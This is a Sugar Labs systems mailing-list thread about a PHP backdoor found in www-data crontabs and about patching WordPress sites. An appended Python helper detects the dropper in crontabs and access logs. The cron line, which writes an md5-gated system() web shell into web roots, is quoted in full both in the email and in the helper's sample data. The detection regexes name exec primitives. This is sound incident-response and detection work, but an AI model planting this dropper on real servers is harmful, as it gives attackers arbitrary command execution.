[Systems] Found a backdoor

Samuel Cantero scanterog at gmail.com
Tue Mar 1 20:55:00 EST 2016


If you want to keep it, I can do the job. I will try to do it this weekend.

Best regards,

Samuel C.

On Tue, Mar 1, 2016 at 10:49 PM, Walter Bender <walter.bender at gmail.com>
wrote:

> Let's shut it down for the time being. I've been updating the wiki but not
> my blog since the attack last year anyway.
>
> -walter
>
> On Tue, Mar 1, 2016 at 7:57 PM, Bernie Innocenti <bernie at codewiz.org>
> wrote:
>
>> +walter
>>
>> Can we appoint an official maintainer for walterbender.org? Sorry for
>> not stepping up myself, but I'm overwhelmed by work related things and
>> trying to reduce my sysadmin load.
>>
>> On 03/01/2016 02:50 PM, Samuel Cantero wrote:
>> > On Tue, Mar 1, 2016 at 3:21 AM, Bernie Innocenti <bernie at codewiz.org> wrote:
>> >
>> >     On 02/25/2016 04:09 AM, Sebastian Silva wrote:
>> >     > Remember in June we had an incident with a broken Wordpress site.
>> >     > I switched to static generator since then.
>> >     >
>> >     > +1 on containers, just learning more about them and finding them fascinating.
>> >     > Count me in on containerizing everything.
>> >     >
>> >     > I'm not aware of other wordpress sites. Maybe walter's blog?
>> >     > Wordpress is a PIA IMHO.
>> >
>> >     Yes, WP is riddled with security holes. Back in October, Samuel helped
>> >     Walter upgrade walterbender.org on sunjammer. Samuel, can you confirm
>> >     that the WP instance is now fully patched and locked down?
>> >
>> >
>> > The WP version on the walterbender.org site is 4.3.1. The latest WP
>> > version is 4.4.2. I have checked the WP change log and we can find this:
>> >
>> > 4.4.1 => WordPress versions 4.4 and earlier are affected by a cross-site
>> > scripting vulnerability that could allow a site to be compromised.
>> >
>> > 4.4.2 => WordPress versions 4.4.1 and earlier are affected by two
>> > security issues: a possible SSRF for certain local URIs, and an open
>> > redirection attack.
>> >
>> > This site also uses the 2.5.9 akismet plugin. The last version is 3.1.7.
>> > Significant information on the release notes:
>> >
>> >   * Pre-emptive security improvements to ensure that the Akismet plugin
>> >     can't be used by attackers to compromise a WordPress installation.
>> >   * Closes a potential XSS vulnerability.
>> >
>> > Of course, every version has a lot of bug fixes. We definitely should
>> > upgrade it and test that nothing breaks on the walterbender.org site.
>> >
>> > Who is in charge of upgrading the other WP sites?
>> >
>> > Regards,
>> >
>> > Samuel C.
>> >
>> >
>> >
>> >
>> >     > Regards,
>> >     > Sebastian
>> >     >
>> >     >
>> >     > On 25/02/16 04:47, Bernie Innocenti wrote:
>> >     >> While I was looking for cronjobs in /var/spool/cron/crontabs/, I found
>> >     >> that www-data was executing commands like these:
>> >     >>
>> >     >> */27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
>> >     >>
>> >     >> Did you spot the system()? This executes arbitrary commands specified
>> >     >> via the "localtime" url parameter. Uh-oh.
>> >     >>
>> >     >> There were about a dozen lines like the above, installing .cache.php in
>> >     >> various virtualhosts. I kept a copy of the file in
>> >     >> /root/www-data.backdoor. The file was last written on Jun 23 2015,
>> >     >> which may correlate with the switch to the new website.
>> >     >>
>> >     >> I cleared the mess and searched the logs for requests containing
>> >     >> "localtime", but couldn't find any. I wonder if they could filter the
>> >     >> logs, since they were previously writable by www-data.
>> >     >>
>> >     >> Please watch out. We should ensure directories accessible over http are
>> >     >> not writable by user www-data, especially those in which PHP and CGIs
>> >     >> are enabled.
>> >     >>
>> >     >> Running several large sites under the same uid has always been a bad
>> >     >> security practice, and looking forward we should keep migrating them to
>> >     >> properly isolated containers.
>> >     >>
>> >     >> Finally, Wordpress is particularly dangerous and we should update and
>> >     >> harden all instances. Can someone please take care of this? I'll do
>> >     >> Mediawiki, which I know pretty well.
>> >     >>
>> >     >
>> >
>> >
>> >     --
>> >      _ // Bernie Innocenti
>> >      \X/  http://codewiz.org
>> >     _______________________________________________
>> >     Systems mailing list
>> >     Systems at lists.sugarlabs.org
>> >     http://lists.sugarlabs.org/listinfo/systems
>> >
>> >
>> >
>> >
>> >
>>
>>
>> --
>>  _ // Bernie Innocenti
>>  \X/  http://codewiz.org
>>
>
>
>
> --
> Walter Bender
> Sugar Labs
> http://www.sugarlabs.org
>
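Added example, not code from the thread or from Sugar Labs: a Python helper that flags crontab entries matching the dropper pattern Bernie quotes (a cron job echoing exec-capable PHP into a web root) and searches access-log lines for requests carrying the backdoor's two query parameters. The combined log format, the sample lines and the addresses are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# A cron command that writes PHP containing a command-execution primitive into
# a web root is the "dropper" pattern Bernie found in www-data's crontab.
PHP_EXEC = re.compile(r"\b(?:system|exec|passthru|shell_exec|popen|eval)\s*\(")
WRITES_PHP = re.compile(r">\s*\S+\.php\b")

def flag_cron_lines(crontab_text):
    """Return the crontab entries whose command writes exec-capable PHP."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # five schedule fields + the command
        if len(fields) < 6:
            continue
        if WRITES_PHP.search(fields[5]) and PHP_EXEC.search(fields[5]):
            hits.append(line)
    return hits

# The backdoor reads its command from "localtime" ("@" stands in for spaces)
# and its gate value from "localdate"; any request carrying both is worth a look.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)')

def find_backdoor_requests(log_lines):
    """Return (client_ip, path, decoded_command) for requests that hit the backdoor."""
    found = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group(2))
        qs = parse_qs(url.query)
        if "localdate" in qs and "localtime" in qs:
            found.append((m.group(1), url.path, qs["localtime"][0].replace("@", " ")))
    return found

# Constructed sample input: the dropper line quoted in the thread plus a benign job.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/certbot renew --quiet
*/27 * * * * echo '<?php if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { $time = str_replace("@"," ",$_GET["localtime"]); @system($time); exit; } ?>' > /srv/www-somosazucar/blog/.cache.php
"""

# Constructed access-log lines (combined format); addresses are documentation-range placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Jun/2015:11:02:17 +0000] "GET /blog/.cache.php?localdate=x&localtime=id HTTP/1.1" 200 31 "-" "curl/7.35.0"',
    '192.0.2.11 - - [23/Jun/2015:11:02:18 +0000] "GET /blog/?p=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
```

Run the two functions over every user's crontab and the full access-log history; an empty result from the log search is not proof of absence if, as Bernie notes, the logs were writable by www-data.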